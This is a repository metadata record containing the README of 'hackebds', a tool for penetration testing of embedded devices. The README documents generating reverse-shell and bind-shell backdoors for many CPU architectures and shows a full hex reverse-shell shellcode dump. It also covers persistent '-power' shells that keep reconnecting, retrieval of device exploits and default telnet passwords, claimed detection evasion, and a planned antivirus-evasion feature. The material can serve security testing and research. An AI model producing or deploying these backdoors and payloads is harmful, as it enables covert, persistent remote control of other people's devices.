{"id":26257550,"url":"https://github.com/doudoudedi/hackembedded","last_synced_at":"2025-04-06T16:13:13.462Z","repository":{"id":43167208,"uuid":"485661878","full_name":"doudoudedi/hackEmbedded","owner":"doudoudedi","description":"This tool is used for backdoor,shellcode generation,Information retrieval and POC arrangement for various architecture devices","archived":false,"fork":false,"pushed_at":"2024-02-29T03:14:52.000Z","size":76040,"stargazers_count":167,"open_issues_count":4,"forks_count":30,"subscribers_count":4,"default_branch":"main","last_synced_at":"2024-04-29T17:49:21.734Z","etag":null,"topics":["cve","exploit","iot","linux","poc","python","reverse-shell","security"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/doudoudedi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2022-04-26T06:32:41.000Z","updated_at":"2024-04-13T20:22:05.000Z","dependencies_parsed_at":"2023-12-12T15:51:06.479Z","dependency_job_id":null,"html_url":"https://github.com/doudoudedi/hackEmbedded","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/doudoudedi%2FhackEmbedded","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/doudoudedi%2FhackEmbedded/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/doudoudedi%2FhackEmbedded/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/doudoudedi%2FhackEmbedded/manifests","
owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/doudoudedi","download_url":"https://codeload.github.com/doudoudedi/hackEmbedded/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247509237,"owners_count":20950232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve","exploit","iot","linux","poc","python","reverse-shell","security"],"created_at":"2025-03-13T21:21:10.635Z","updated_at":"2025-04-06T16:13:13.433Z","avatar_url":"https://github.com/doudoudedi.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# hackebds\n\n![PyPI - Wheel](https://img.shields.io/pypi/wheel/hackebds)![PyPI - Python Version](https://img.shields.io/pypi/pyversions/pwntools)\n[![Downloads](https://static.pepy.tech/badge/hackebds)](https://pepy.tech/project/hackebds)\n![PyPI - Downloads](https://img.shields.io/pypi/dm/hackebds)\n\n\n:link:[Chinese readme](https://github.com/doudoudedi/hackEmbedded/blob/main/readme_cn.md)\n\n## foreword\n\n\u003eIn the process of penetration testing and vulnerability mining on embedded devices, many problems have been encountered. One is that some devices do not have telnetd or ssh services through which an interactive shell can be obtained, and some devices are protected by a firewall and cannot be connected to directly, so a reverse_shell is required. The other is that memory corruption vulnerabilities such as stack overflows are usually truncated by null bytes, so constructing reverse_shellcode is more troublesome. This tool was developed to address both problems when exploiting such vulnerabilities. 
This tool is developed based on the pwn module (pwntools). It originally used Python 2 and **has been updated to Python 3**.\n\n## function\n\n\nThis tool is used in the security testing of embedded devices. Its main functions are:\n\n1. Generate **backdoor programs** (ELF only) for various architectures. The backdoor program is packaged from pure shellcode without a shell wrapper, and is a small, purely static backdoor. **Armv5, Armv7, Armv8, mipsel, mips, mips64, mipsel64, powerpc, powerpc64, sparc, sparc64 and mipsn32 are now supported, and more are still being added** (PS: bash support was added to the reverse shell after version 0.3.1. If the reverse shell backdoor is generated with the -power parameter, the reverse shell will be continuously regenerated on the target machine)\n2. Generate **reverse_shell shellcode** (Linux only) for various architectures during the exploit process, with no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. **Armv5, Armv7, Armv8, mipsel, mips, mips64, mipsel64, powerpc, powerpc64 and sparc are now supported, and more are still being added**\n3. Generate **bind_shell** files (ELF only) for various architectures; -power makes the bind_shell persistent (if you use the -power parameter, you can specify the bash shell; please do not run the process in the background, to prevent data redirection errors)\n4. Sort out the exploitable vulnerability POCs or EXPs of embedded devices, and search for and output the basic information and POC of the device model in use: device function, device architecture, device CPU manufacturer, device CPU model, the device's web service program, and so on\n5. 
Support command-line generation of backdoors and shellcode, with strong anti-hunting ability, characterized by being light, small, efficient and fast\n\n\n## install\n\n```\nuse docker:\ndocker pull doudoudedi/hackebds:3.8\n(This version will encounter issues with generating shellcode for armv5, which will be fixed in the next version)\n```\n\n\nJust use pip to install; if the installation fails, try installing with sudo\n\n```\nUse pip install:\nsudo pip install -U hackebds\n\nlocal install:\ngit clone https://github.com/doudoudedi/hackEmbedded\nsudo ./start.sh\n```\n\n(If you want this tool to run on a macOS system, you need to add python/bin to the PATH environment variable in your bashrc)\n\n```\necho 'export PATH=\"/Users/{you id}/Library/Python/{your installed python}/bin:$PATH\"'\u003e\u003e ~/.bashrc\n```\n\n![image-20221125095653018](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221125095653018.png)\n\n\n![image-20221121142622451](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221121142622451.png)\n\n#### Instructions for use\n\n![image-20221118202002242](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221118202002242.png)\n\nPlease install the corresponding binutils environment before use\nexample:\n\n```\nUbuntu (debian):\n  apt search binutils | grep arm (You can replace the architecture here; if nothing is found, please execute \"apt update\" first)\n  apt install binutils-arm-linux-gnueabi/hirsute\n MacOS:\n \t https://github.com/Gallopsled/pwntools-binutils\n \t brew install https://raw.githubusercontent.com/Gallopsled/pwntools-binutils/master/osx/binutils-$ARCH.rb\n```\n\n1. 
Use the command line to generate backdoor files, shellcode, bind shells, etc.\n\n   ![image-20221206180431454](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221206180431454.png)\n\n   Redesigned the relationship between model and arch: when generating a backdoor, the device model can now be specified directly, but the model needs to match a name listed by the -l parameter\n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 9999 -model DIR-816 -res reverse_shell_file\n   or\n   hackebds -lhost 127.0.0.1 -lport 9999 -model DIR-816 -res reverse_shell_file\n   ```\n\n   ![image-20230710112652819](https://myblog-1257937445.cos.ap-nanjing.myqcloud.com/img/image-20230710112652819.png)\n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shellcode\n   or\n   hackebds -lhost 127.0.0.1 -lport 9999 -arch mipsel -res reverse_shellcode\n   ```\n\n   ![image-20221102181217933](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221102181217933.png)\n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shell_file\n   or\n   hackebds -lhost 127.0.0.1 -lport 8081 -arch armelv7 -res reverse_shell_file\n   ```\n\n   By default, the reverse shell backdoor is created using sh. 
If bash is required (PS: the bash command needs to exist on the target device)\n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shell_file -shell bash\n   or \n   hackebds -lhost 127.0.0.1 -lport 8081 -arch armelv7 -res reverse_shell_file -shell bash\n   ```\n\n   If you need to generate a backdoor that constantly re-creates reverse shells (the CPU usage measured in testing is about 8%)\n\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shell_file -shell bash -power\n   or\n   hackebds -lhost 127.0.0.1 -lport 8081 -arch armelv7 -res reverse_shell_file -shell bash -power\n   ```\n   If you need to create a reverse shell every 5 seconds\n   ```\n   hackebds -reverse_ip 127.0.0.1 -reverse_port 9999 -arch mipsel -res reverse_shell_file -power -sleep 5\n   or\n   hackebds -lhost 127.0.0.1 -lport 9999 -arch mipsel -res reverse_shell_file -power -sleep 5\n   ```\n\n   ![image-20221102183017775](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221102183017775.png)\n\n   ```\n   hackebds -bind_port 8080 -passwd 1234 -arch mips -model DIR-823 -res bind_shell\n   ```\n\n   Creates a bind_shell that listens with sh as the shell; the -power function also accepts -shell bash\n\n   ```\n   hackebds -bind_port 8081 -arch armelv7 -res bind_shell -passwd 1231 -power\n   ```\n\n   The bind_shell process will not stop after the client disconnects, and supports repeated connections (currently this function is not supported for the powerpc and sparc series)\n\n   ![image-20221102182939434](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221102182939434.png)\n\n   The cmd_file generation function has been updated. 
Only the -cmd parameter needs to be specified to generate programs for various architectures that execute the corresponding command; -envp environment variables are separated by commas\n\n   ```\n   hackebds  -cmd \"ls -al /\" -arch powerpc  -res cmd_file\n   ```\n\n   ![image-20230106153459125](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230106153459125.png)\n\n   A listing of the model-to-architecture relationship has been added to the function for generating the backdoor of a specified model, so that users can inspect and modify it. The output information is enhanced after version 0.3.5 (100+ devices, around 80+ POCs), for example:\n\n   - Function of equipment\n   - Architecture of equipment\n   - Device CPU manufacturer\n   - Device CPU model\n   - WEB service program of the device\n   - Device default SSH service support\n   - Whether monitoring can be realized\n   - Device default telnet user password\n   - Device sdk support\n   - Openwrt support for devices\n   - Whether the device is vulnerable\n   - POC output\n\n   ```\n   hackebds -l\n   ```\n\n   ![image-20230213151548871](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230213151548871.png)\n\n   Added retrieval of device information: use -s to search for the value given to the -model parameter. This search is fuzzy and case insensitive. Try to use lowercase when inputting; the device information that best matches the input is output (EXP and POC output were introduced in version 0.3.7)\n\n   If the following error occurs\n\n   hackebds: error: argument -model: expected one argument\n\n   Please set all parameters to lowercase or lowercase mixed with uppercase. 
I guess it is due to the conflict between python and bash in the interpretation of uppercase and lowercase letters\n\n   ```\n   hackebds -model ex200 -s\n   ```\n\n   If the following warning occurs during command output\n\n   /usr/local/lib/python3.8/dist-packages/fuzzywuzzy/fuzz.py:11: UserWarning: Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning\n     warnings.warn('Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning')\n\n   you can use the following command to install python-levenshtein. After installation, the retrieval speed of the command is increased by about 4 times\n\n   ```\n   pip install python-levenshtein\n   ```\n\n   ![image-20230213105520663](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230213105520663-20230213151846373.png)\n\n   The POC corresponding to the found device can be output with -p or --poc. It may be a python script, a command, etc., and may need to be modified by yourself\n\n   ```\n   hackebds -model ex200 -p\n   ```\n\n   ![image-20230213105925356](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230213105925356.png)\n\n   Added CVE search\n\n   ```\n   hackebds -CVE CVE-2019-17621\n   ```\n\n   ![image-20230530172408297](https://myblog-1257937445.cos.ap-nanjing.myqcloud.com/img/image-20230530172408297.png)\n\n   If a vulnerability is found during testing and you want to add the basic information of a new device to this tool, you can use the -add function. The format of the new device's directory under \"/tmp/model_tree_info/\", and of its POC files, can follow the standard generated format. 
After insertion, you can use the tool's search and POC generation functions. Finally, if you need to fill in POC file information, you can put it in the \"/tmp/model_tree_info/xxx/POC\" directory; it will be read when a search is performed again\n\n   ```\n   hackebds -add\n   ```\n\n   ![image-20230213111024854](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20230213111024854.png)\n\n   If there are device information errors, POC errors, or you want to integrate your collected device information with vulnerabilities, please contact me at doudoudedi233@gmail.com\n\n3. Generate backdoor programs of various architectures that encapsulate pure shellcode, and successfully connect to the shell\n\n```\n\u003e\u003e\u003e from hackebds import *\n\u003e\u003e\u003e mipsel_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e aarch64_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e armelv5_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e armelv7_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e armebv5_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e armebv7_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips64_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips64el_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e x86el_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e x64el_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e sparc32.sparc_backdoor(reverse_ip, reverse_port)#big endian\n\u003e\u003e\u003e sparc64.sparc_backdoor(reverse_ip, reverse_port)#big endian\n\u003e\u003e\u003e powerpc_info.powerpc_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e powerpc_info.powerpcle_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e powerpc_info.powerpc64_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e powerpc_info.powerpc64le_backdoor(reverse_ip, reverse_port)\n\u003e\u003e\u003e x86_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e 
x64_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e armelv7_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e aarch64_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e mips_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e mipsel_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e sparc32.sparc_bind_shell(listen_port, passwd)\n\u003e\u003e\u003e powerpc_info.powerpc_bind_shell(listen_port, passwd)\n```\n\n(Note that the maximum password length is 4 characters for x86 (32 bits) and 8 characters for x64 (64 bits))\n\n```\n\u003e\u003e\u003e mipsel_backdoor(\"127.0.0.1\",5566)\n[+] reverse_ip is: 127.0.0.1\n[+] reverse_port is: 5566\n[*] waiting 3s\n[+] mipsel_backdoor is ok in current path ./\n\u003e\u003e\u003e\n```\n\n![image-20221028144512270](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221028144512270.png)\n\n```\n\u003e\u003e\u003e from hackebds import *\n\u003e\u003e\u003e x86_bind_shell(4466,\"doud\")\n[+] bind port is set to 4466\n[+] passwd is set to 'doud'\n0x0000000064756f64\n[*] waiting 3s\n[+] x86_bind_shell is ok in current path ./\n\u003e\u003e\u003e\n```\n\n![image-20221028143802937](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221028143802937.png)\n\nThen connect to the port bound on the device (a password is required)\n\n![image-20221028144136069](https://raw.githubusercontent.com/doudoudedi/blog-img/master/uPic/image-20221028144136069.png)\n\n2. 
Generate null-byte-free reverse shellcode for the various architectures\n\n```\n\u003e\u003e\u003e from hackebds import *\n\u003e\u003e\u003e mipsel_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e aarch64_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e armelv5_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e armelv7_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e armebv5_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e armebv7_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips64_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e mips64el_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e android_aarch64_backdoor(reverse_ip,reverse_port)\n\u003e\u003e\u003e x86el_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e x64el_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e powerpc_info.ppc_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e powerpc_info.ppcle_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e powerpc_info.ppc64_reverse_sl(reverse_ip,reverse_port)\n\u003e\u003e\u003e powerpc_info.ppc64le_reverse_sl(reverse_ip,reverse_port)\n```\n\nexample:\n\n```\n\u003e\u003e\u003e from hackebds import *\n\u003e\u003e\u003e shellcode=mipsel_reverse_sl(\"127.0.0.1\",5566)\n[+] No NULL byte shellcode for hex(len is 
264):\n\\xfd\\xff\\x19\\x24\\x27\\x20\\x20\\x03\\xff\\xff\\x06\\x28\\x57\\x10\\x02\\x34\\xfc\\xff\\xa4\\xaf\\xfc\\xff\\xa5\\x8f\\x0c\\x01\\x01\\x01\\xfc\\xff\\xa2\\xaf\\xfc\\xff\\xb0\\x8f\\xea\\x41\\x19\\x3c\\xfd\\xff\\x39\\x37\\x27\\x48\\x20\\x03\\xf8\\xff\\xa9\\xaf\\xff\\xfe\\x19\\x3c\\x80\\xff\\x39\\x37\\x27\\x48\\x20\\x03\\xfc\\xff\\xa9\\xaf\\xf8\\xff\\xbd\\x27\\xfc\\xff\\xb0\\xaf\\xfc\\xff\\xa4\\x8f\\x20\\x28\\xa0\\x03\\xef\\xff\\x19\\x24\\x27\\x30\\x20\\x03\\x4a\\x10\\x02\\x34\\x0c\\x01\\x01\\x01\\xf7\\xff\\x85\\x20\\xdf\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01\\xfe\\xff\\x19\\x24\\x27\\x28\\x20\\x03\\xdf\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01\\xfd\\xff\\x19\\x24\\x27\\x28\\x20\\x03\\xdf\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01\\x69\\x6e\\x09\\x3c\\x2f\\x62\\x29\\x35\\xf8\\xff\\xa9\\xaf\\x97\\xff\\x19\\x3c\\xd0\\x8c\\x39\\x37\\x27\\x48\\x20\\x03\\xfc\\xff\\xa9\\xaf\\xf8\\xff\\xbd\\x27\\x20\\x20\\xa0\\x03\\x69\\x6e\\x09\\x3c\\x2f\\x62\\x29\\x35\\xf4\\xff\\xa9\\xaf\\x97\\xff\\x19\\x3c\\xd0\\x8c\\x39\\x37\\x27\\x48\\x20\\x03\\xf8\\xff\\xa9\\xaf\\xfc\\xff\\xa0\\xaf\\xf4\\xff\\xbd\\x27\\xff\\xff\\x05\\x28\\xfc\\xff\\xa5\\xaf\\xfc\\xff\\xbd\\x23\\xfb\\xff\\x19\\x24\\x27\\x28\\x20\\x03\\x20\\x28\\xa5\\x03\\xfc\\xff\\xa5\\xaf\\xfc\\xff\\xbd\\x23\\x20\\x28\\xa0\\x03\\xff\\xff\\x06\\x28\\xab\\x0f\\x02\\x34\\x0c\\x01\\x01\\x01\n```\n\n## chips and architectures\n\nTests can leverage chips and architectures\n\nMips:\nMIPS 74kc V4.12 big endian,\nMIPS 24kc V5.0  little endian (Ralink SoC) like MediaTek MT7621\nIngenic Xburst V0.0  FPU V0.0  little endian\n\nArmv7:\nAllwinner(全志)V3s\n\nArmv8:\nQualcomm Snapdragon 660\nBCM2711\n\nPowerpc, sparc: qemu\n\n\n## :beer:enjoy hacking\n\n\n## updating\n\n 2022.4.19 Added support for aarch64 null-byte reverse_shellcode\n\n 2022.4.30 Reduced amount of code using functions and support python3\n\n 2022.5.5 0.0.8 version Solved the bug that mips_reverse_sl and mipsel_reverse_sl were not enabled, added mips64_backdoor, mips64_reverse_sl generation and 
mips64el_backdoor, mips64el_reverse_sl generation\n\n 2022.5.21 0.0.9 version changed the generation method of the armel V5 backdoor and added generation of the riscv-v64 backdoor\n\n 2022.6.27 0.1.0 Added Android backdoor generation\n\n 2022.10.26 0.1.5 Fixed some problems and added automatic generation of bindshells with a specified port and password\n\n 2022.10.27 0.1.6 Added support for armv7el_bind_shell\n\n 2022.11.1 Removed the sleep time when generating shellcode, added mips_bind_shell and little-endian x86 and x64 reverse_shell backdoors, and fixed the mips_bind_shell, which was expected to be interrupted; this resolves the password logic handling error in the mips bindshell\n\n 2022.11.2 Added aarch64_bind_shell\n 2022.11.2 Support command line generation of backdoors and shellcode, characterized by being light, small, efficient and fast\n\n 2022.12.6 0.2.8 Added sparc_bind_shell \u0026\u0026 powerpc_bind_shell, fixed some bugs\n\n 2022.12.26 0.2.9 Added the function of generating programs that execute specified commands, and added executable permissions to generated files\n\n 2023.1.6 0.3.0 Fixed the bug in cmd_file generation of programs that execute a specified command, and added the model -\u003e arch list and the Android bind_shell file\n\n 2023.1.16 0.3.1 Added bash reverse_shell. At present, this tool only supports sh and bash. The -l function was added to list the relationship between device model and architecture, and the -power function was added to generate a more powerful reverse_shell_file, which continuously re-creates the reverse shell connection without killing the program. 
Currently, the -power function only supports reverse_shell_file\n\n 2023.1.29 0.3.3 The -power function adds support for bind_shell, bind_shell is more stable, and some bugs in the execution of bind_shell and cmd_file files on the aarch64 architecture are fixed\n\n2023.3.7 0.3.6 Added support for the mipsn32 architecture (this architecture may be encountered in devices such as zyxel firewalls)\n\n2023.5.30 Added CVE retrieval, and output of the content of EXP and POC files in the device information\n\n2023.11.11 Fixed the issue of armv5 series backdoors not being able to spawn a shell on the Vitogate_300; the backdoors now work normally. Simplified the reverse_ip and similar parameters, which can now be given as -lhost and -lport. Added some device vulnerabilities\n\n## Problems to be solved\n\nSupport backdoor and bind_shell generation for the loongarch64 architecture (binutils support has been integrated into the mainline, but cannot be installed directly through apt)\n\nImprove the generation of power_bind_shell backdoors for the powerpc and sparc series\n\nAdd an anti-kill function for backdoor programs\n\n\n\n## vul fix\n\n\nCVE-2021-29921: the tool is a pure client program, so this vulnerability does not affect its use. If you want to fix it, please run the tool on Python 3.9 or above\n\nCVE-2022-40023 (DoS): pip install -U  mako (the vulnerability does not apply to this tool)\n\nCVE-2021-20270 (DoS): pip install -U  pygments (the vulnerability does not apply to this tool)\n\n Version 0.2.5 fixed a directory traversal in the specified-model function\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdoudoudedi%2Fhackembedded","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdoudoudedi%2Fhackembedded","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdoudoudedi%2Fhackembedded/lists"}